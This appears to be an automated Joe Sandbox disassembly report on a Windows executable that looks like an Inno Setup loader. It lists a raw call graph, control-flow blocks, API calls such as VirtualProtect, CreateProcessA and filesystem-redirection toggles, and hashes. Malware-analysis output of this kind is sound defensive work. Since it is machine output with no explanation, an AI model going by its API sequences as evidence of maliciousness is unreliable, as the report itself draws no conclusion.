5043->5040 5044 4025ac 4 API calls 5043->5044 5044->5040 5045->4994 5305 406af0 5046->5305 5048 406ba1 5049 403198 4 API calls 5048->5049 5050 406bbf 5049->5050 5050->4999 5319 4033b4 5051->5319 5053 409a27 5054 409a59 CreateProcessA 5053->5054 5055 409a65 5054->5055 5056 409a6c CloseHandle 5054->5056 5057 409648 35 API calls 5055->5057 5058 409a75 5056->5058 5057->5056 5059 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5058->5059 5060 409a7a MsgWaitForMultipleObjects 5059->5060 5060->5058 5061 409a91 5060->5061 5062 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5061->5062 5063 409a96 GetExitCodeProcess CloseHandle 5062->5063 5064 409ab6 5063->5064 5065 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5064->5065 5066 409abe 5065->5066 5066->5002 5067 402f24 5068 403154 4 API calls 5067->5068 5069 402f29 5068->5069 5325 402bcc 5069->5325 5071 402f51 5071->5071 5073 40990e 5072->5073 5074 4098d4 5072->5074 5073->5004 5074->5073 5075 403420 18 API calls 5074->5075 5076 409908 5075->5076 5328 408e80 5076->5328 5079 409532 5078->5079 5083 4094eb 5078->5083 5079->5006 5080 4094f3 Sleep 5080->5083 5081 409503 Sleep 5081->5083 5083->5079 5083->5080 5083->5081 5084 40951a GetLastError 5083->5084 5351 408fbc 5083->5351 5084->5079 5085 409524 GetLastError 5084->5085 5085->5079 5085->5083 5087 403591 5086->5087 5088 4035a0 5086->5088 5091 4035d0 5087->5091 5092 40359b 5087->5092 5096 4035b6 5087->5096 5089 4035b1 5088->5089 5090 4035b8 5088->5090 5093 403198 4 API calls 5089->5093 5094 4031b8 4 API calls 5090->5094 5091->5096 5097 40357c 4 API calls 5091->5097 5092->5088 5095 4035ec 5092->5095 5093->5096 5094->5096 5095->5096 5368 403554 5095->5368 5096->5013 5097->5091 5100 4025b0 5099->5100 5101 4025ba 5099->5101 5100->5101 5102 403154 4 API calls 5100->5102 5101->5015 5102->5101 5126 4051a8 5103->5126 5106 407284 FormatMessageA 5107 4072aa 5106->5107 5108 403278 18 API calls 5107->5108 5109 4072c7 5108->5109 5110 408da8 5109->5110 5111 408dc8 5110->5111 5269 408c80 5111->5269 5114 405890 5115 405897 5114->5115 5116 4031e8 18 API calls 5115->5116 5117 4058af 5116->5117 5117->5024 5120 4031be 5118->5120 5119 4031e3 5122 403198 5119->5122 5120->5119 5121 4025ac 4 API calls 5120->5121 5121->5120 5123 4031b7 5122->5123 5124 40319e 5122->5124 5123->4989 5123->5067 5124->5123 5125 4025ac 4 API calls 5124->5125 5125->5123 5127 4051c5 5126->5127 5134 404e58 5127->5134 5130 4051f1 5139 403278 5130->5139 5136 404e73 5134->5136 5135 404e85 5135->5130 5144 404be4 5135->5144 5136->5135 5147 404f7a 5136->5147 5154 404e4c 5136->5154 5140 403254 18 API calls 5139->5140 5141 403288 5140->5141 5142 403198 4 API calls 5141->5142 5143 4032a0 5142->5143 5143->5106 5261 405940 5144->5261 5146 404bf5 5146->5130 5148 404f8b 5147->5148 5151 404fd9 5147->5151 5148->5151 5152 40505f 5148->5152 5150 404ff7 5150->5136 5151->5150 5157 404df4 5151->5157 5152->5150 5161 404e38 5152->5161 5155 403198 4 API calls 5154->5155 5156 404e56 5155->5156 5156->5136 5158 404e02 5157->5158 5164 404bfc 5158->5164 5160 404e30 5160->5151 5191 4039a4 5161->5191 5167 4059b0 5164->5167 5166 404c15 5166->5160 5168 4059be 5167->5168 5177 404cdc LoadStringA 5168->5177 5171 405194 33 API calls 5172 4059f6 5171->5172 5180 4031e8 5172->5180 5175 4031b8 4 API calls 5176 405a1b 5175->5176 5176->5166 5178 403278 18 API calls 5177->5178 5179 404d09 5178->5179 5179->5171 5181 4031ec 5180->5181 5184 4031fc 5180->5184 5181->5184 5186 403254 5181->5186 5182 403228 5182->5175 5184->5182 5185 4025ac 4 API calls 5184->5185 5185->5182 5187 403274 5186->5187 5188 403258 5186->5188 5187->5184 5189 402594 18 API calls 5188->5189 5190 403261 5189->5190 5190->5184 5192 4039ab 5191->5192 5197 4038b4 5192->5197 5194 4039cb 5195 403198 4 API calls 5194->5195 5196 4039d2 5195->5196 5196->5150 5198 4038d5 5197->5198 5199 4038c8 5197->5199 5201 403934 5198->5201 5202 4038db 5198->5202 5225 403780 5199->5225 5203 403993 5201->5203 5204 40393b 5201->5204 5205 4038e1 5202->5205 5206 4038ee 5202->5206 5208 4037f4 3 API calls 5203->5208 5209 403941 5204->5209 5210 40394b 5204->5210 5232 403894 5205->5232 5207 403894 6 API calls 5206->5207 5213 4038fc 5207->5213 5211 4038d0 5208->5211 5247 403864 5209->5247 5215 4037f4 3 API calls 5210->5215 5211->5194 5237 4037f4 5213->5237 5217 40395d 5215->5217 5218 403864 23 API calls 5217->5218 5220 403976 5218->5220 5219 403917 5243 40374c 5219->5243 5222 40374c VariantClear 5220->5222 5224 40398b 5222->5224 5223 40392c 5223->5194 5224->5194 5226 4037f0 5225->5226 5227 403744 5225->5227 5226->5211 5227->5225 5228 4037ab 5227->5228 5229 403793 VariantClear 5227->5229 5230 4037dc VariantCopyInd 5227->5230 5231 403198 4 API calls 5227->5231 5228->5211 5229->5227 5230->5226 5230->5227 5231->5227 5252 4036b8 5232->5252 5235 40374c VariantClear 5236 4038a9 5235->5236 5236->5211 5238 403845 VariantChangeTypeEx 5237->5238 5239 40380a VariantChangeTypeEx 5237->5239 5240 403832 5238->5240 5241 403826 5239->5241 5240->5219 5242 40374c VariantClear 5241->5242 5242->5240 5244 403766 5243->5244 5245 403759 5243->5245 5244->5223 5245->5244 5246 403779 VariantClear 5245->5246 5246->5223 5258 40369c SysStringLen 5247->5258 5250 40374c VariantClear 5251 403882 5250->5251 5251->5211 5253 4036cb 5252->5253 5254 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5253->5254 5255 4036db 5253->5255 5256 40372e 5254->5256 5257 4036ed MultiByteToWideChar SysAllocStringLen 5255->5257 5256->5235 5257->5256 5259 403610 21 API calls 5258->5259 5260 4036b3 5259->5260 5260->5250 5262 40594c 5261->5262 5263 404cdc 19 API calls 5262->5263 5264 405972 5263->5264 5265 4031e8 18 API calls 5264->5265 5266 40597d 5265->5266 5267 403198 4 API calls 5266->5267 5268 405992 5267->5268 5268->5146 5270 403198 4 API calls 5269->5270 5272 408cb1 5269->5272 5270->5272 5271 4031b8 4 API calls 5273 408d69 5271->5273 5274 408cc8 5272->5274 5275 403278 18 API calls 5272->5275 5277 408cdc 5272->5277 5278 4032fc 18 API calls 5272->5278 5273->5114 5276 4032fc 18 API calls 5274->5276 5275->5272 5276->5277 5277->5271 5278->5272 5280 4034fd 5279->5280 5287 40352d 5279->5287 5281 403526 5280->5281 5283 403509 5280->5283 5284 403254 18 API calls 5281->5284 5282 403198 4 API calls 5285 403517 5282->5285 5288 4025c4 5283->5288 5284->5287 5285->5045 5287->5282 5289 4025ca 5288->5289 5290 4025dc 5289->5290 5292 403154 5289->5292 5290->5285 5290->5290 5293 403164 5292->5293 5294 40318c TlsGetValue 5292->5294 5293->5290 5295 403196 5294->5295 5296 40316f 5294->5296 5295->5290 5300 40310c 5296->5300 5298 403174 TlsGetValue 5299 403184 5298->5299 5299->5290 5301 403120 LocalAlloc 5300->5301 5302 403116 5300->5302 5303 40313e TlsSetValue 5301->5303 5304 403132 5301->5304 5302->5301 5303->5304 5304->5298 5306 406b1c 5305->5306 5307 403278 18 API calls 5306->5307 5308 406b29 5307->5308 5315 403420 5308->5315 5310 406b31 5311 4031e8 18 API calls 5310->5311 5312 406b49 5311->5312 5313 403198 4 API calls 5312->5313 5314 406b6b 5313->5314 5314->5048 5316 403426 5315->5316 5318 403437 5315->5318 5317 403254 18 API calls 5316->5317 5316->5318 5317->5318 5318->5310 5320 4033bc 5319->5320 5321 403254 18 API calls 5320->5321 5322 4033cf 5321->5322 5323 4031e8 18 API calls 5322->5323 5324 4033f7 5323->5324 5326 402bd5 RaiseException 5325->5326 5327 402be6 5325->5327 5326->5327 5327->5071 5329 408e8e 5328->5329 5331 408ea6 5329->5331 5341 408e18 5329->5341 5332 408e18 18 API calls 5331->5332 5333 408eca 5331->5333 5332->5333 5344 407918 5333->5344 5335 408ee5 5336 408e18 18 API calls 5335->5336 5337 408ef8 5335->5337 5336->5337 5338 408e18 18 API calls 5337->5338 5339 403278 18 API calls 5337->5339 5340 408f27 5337->5340 5338->5337 5339->5337 5340->5073 5342 405890 18 API calls 5341->5342 5343 408e29 5342->5343 5343->5331 5347 4078c4 5344->5347 5348 4078d6 5347->5348 5349 4078e7 5347->5349 5350 4078db InterlockedExchange 5348->5350 5349->5335 5350->5349 5359 408f70 5351->5359 5353 408fd2 5354 408fd6 5353->5354 5355 408ff2 DeleteFileA GetLastError 5353->5355 5354->5083 5356 409010 5355->5356 5365 408fac 5356->5365 5360 408f7a 5359->5360 5361 408f7e 5359->5361 5360->5353 5362 408fa0 SetLastError 5361->5362 5363 408f87 Wow64DisableWow64FsRedirection 5361->5363 5364 408f9b 5362->5364 5363->5364 5364->5353 5366 408fb1 Wow64RevertWow64FsRedirection 5365->5366 5367 408fbb 5365->5367 5366->5367 5367->5083 5370 403566 5368->5370 5371 403578 5370->5371 5372 403604 5370->5372 5371->5095 5373 40357c 5372->5373 5376 40359b 5373->5376 5379 4035a0 5373->5379 5381 4035b6 5373->5381 5382 4035d0 5373->5382 5374 4035b1 5377 403198 4 API calls 5374->5377 5375 4035b8 5378 4031b8 4 API calls 5375->5378 5376->5379 5380 4035ec 5376->5380 5377->5381 5378->5381 5379->5374 5379->5375 5380->5381 5384 403554 4 API calls 5380->5384 5381->5370 5382->5381 5383 40357c 4 API calls 5382->5383 5383->5382 5384->5380 6675 401ab9 6676 401a96 6675->6676 6677 401aa9 RtlDeleteCriticalSection 6676->6677 6678 401a9f RtlLeaveCriticalSection 6676->6678 6678->6677

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 116 409b78-409b9c GetSystemInfo VirtualQuery 117 409ba2 116->117 118 409c2c-409c33 116->118 119 409c21-409c26 117->119 119->118 120 409ba4-409bab 119->120 121 409c0d-409c1f VirtualQuery 120->121 122 409bad-409bb1 120->122 121->118 121->119 122->121 123 409bb3-409bbb 122->123 124 409bcc-409bdd VirtualProtect 123->124 125 409bbd-409bc0 123->125 127 409be1-409be3 124->127 128 409bdf 124->128 125->124 126 409bc2-409bc5 125->126 126->124 129 409bc7-409bca 126->129 130 409bf2-409bf5 127->130 128->127 129->124 129->127 131 409be5-409bee call 409b70 130->131 132 409bf7-409bf9 130->132 131->130 132->121 133 409bfb-409c08 VirtualProtect 132->133 133->121
                                                                                                      APIs
                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                                      • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                                      • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2441996862-0
                                                                                                      • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                                      • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                                      • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                                      • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                                      APIs
                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 2299586839-0
                                                                                                      • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                                      • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                                      • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                                      • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                                      • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                      • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                      • API String ID: 3256987805-3653653586
                                                                                                      • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                      • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                                      • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                      • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                                        • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020924CC), ref: 0040966C
                                                                                                      • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                      • SetWindowLongA.USER32(00010434,000000FC,00409960), ref: 0040AB15
                                                                                                      • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                      • DestroyWindow.USER32(00010434,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                                      • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                      • API String ID: 3757039580-3001827809
                                                                                                      • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                                      • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                                      • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                                      • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                      • API String ID: 1646373207-2130885113
                                                                                                      • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                                      • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                                      • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                                      • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                      • SetWindowLongA.USER32(00010434,000000FC,00409960), ref: 0040AB15
                                                                                                        • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                                        • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020924CC,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                        • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020924CC,00409AD8,00000000), ref: 00409A70
                                                                                                        • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                        • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                        • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020924CC,00409AD8), ref: 00409AA4
                                                                                                      • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                      • DestroyWindow.USER32(00010434,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                      • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                      • API String ID: 3586484885-3001827809
                                                                                                      • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                      • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                                      • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                      • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020924CC,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                      • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020924CC,00409AD8,00000000), ref: 00409A70
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                      • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020924CC,00409AD8), ref: 00409AA4
                                                                                                        • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020924CC), ref: 0040966C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                      • String ID: D
                                                                                                      • API String ID: 3356880605-2746444292
                                                                                                      • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                      • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                                      • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                      • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 136 401918-40193a RtlInitializeCriticalSection 137 401946-40197c call 4012dc * 3 LocalAlloc 136->137 138 40193c-401941 RtlEnterCriticalSection 136->138 145 4019ad-4019c1 137->145 146 40197e 137->146 138->137 150 4019c3-4019c8 RtlLeaveCriticalSection 145->150 151 4019cd 145->151 147 401983-401995 146->147 147->147 149 401997-4019a6 147->149 149->145 150->151
                                                                                                      APIs
                                                                                                      • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                      • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                      • String ID:
                                                                                                      • API String ID: 730355536-0
                                                                                                      • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                      • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                      • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                      • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message
                                                                                                      • String ID: .tmp$y@
                                                                                                      • API String ID: 2030045667-2396523267
                                                                                                      • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                      • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                                      • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                      • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

